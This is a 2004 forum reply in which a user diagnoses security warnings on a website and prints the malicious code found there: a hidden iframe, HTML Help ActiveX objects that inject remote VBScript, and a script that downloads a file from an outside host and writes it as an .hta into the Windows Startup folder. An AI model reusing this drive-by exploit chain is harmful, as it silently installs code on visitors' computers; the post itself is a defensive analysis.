19072 Members
14 Forums
40358 Topics
614269 Posts
Max Online: 1680 @ 12/05/25 07:10 AM
|
|
|
#76084 - 12/27/04 02:09 PM
Re: lukeisback
|
Kurt Lackwood's Fluffer
Registered: 10/09/04
Posts: 1176
|
Quote:
Can someone else with computer knowledge hit www.lukeisback.com and see if something there brings up a slew of security warnings? I'm thinking that one of his advertisers has nazi infiltrators.
It's trying to replace a file called c:\windows\system\hhctrl.ocx
I know this is offtopic for the cage but since we're all fascinated with his site, and know he reads the cage, maybe he can get it fixed. (I didn't let lukeisback replace any files on my computer).
hhctrl.ocx is the HTML Help ActiveX Control. Like most ActiveX controls it has it's legitimate uses, but the whole ActiveX system is a security nightmare, relying on code being downloaded from "trustworthy" sites (thanks Microsoft.)
I didn't get the warning because I use Firefox, which purposefully ignores the whole ActiveX mess. I haven't missed it.
A quick dig through the source of Luke's site reveals this line at the very end to be the offender:
<iframe src="http://www.outdoornewswire.com/iesploit/spatch.htm" frameborder=0 width=0 height=0 marginwidth=0 marginheight=0 scrolling=no></iframe>
Which references this code hosted on outdoornewswire.com:
<OBJECT id="localpage" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">
</OBJECT>
<OBJECT id="inject" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script language=\\\"vbscript\\\" src=\\\"http://www.outdoornewswire.com/iesploit/writehta.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>
<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>
which references this vbscript code hosted in the text file writehta.txt on outdoornewswire.com:
on error resume next
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://www.outdoornewswire.com;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs = CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML
rs.close
conn.close
I don't know enough to figure out exactly what it all does, but I don't like the look of it.
_________________________
"If I were a guy, not swallowing would be a deal breaker. So what if you cook and clean? I can get a maid for that." - Gia Jordan
|
|
Top
|
|
|
|
|
|
0 registered (),
828
Guests and
3
Spiders online. |
|
Key:
Admin,
Global Mod,
Mod
|
|
|
Previous Topic
Index
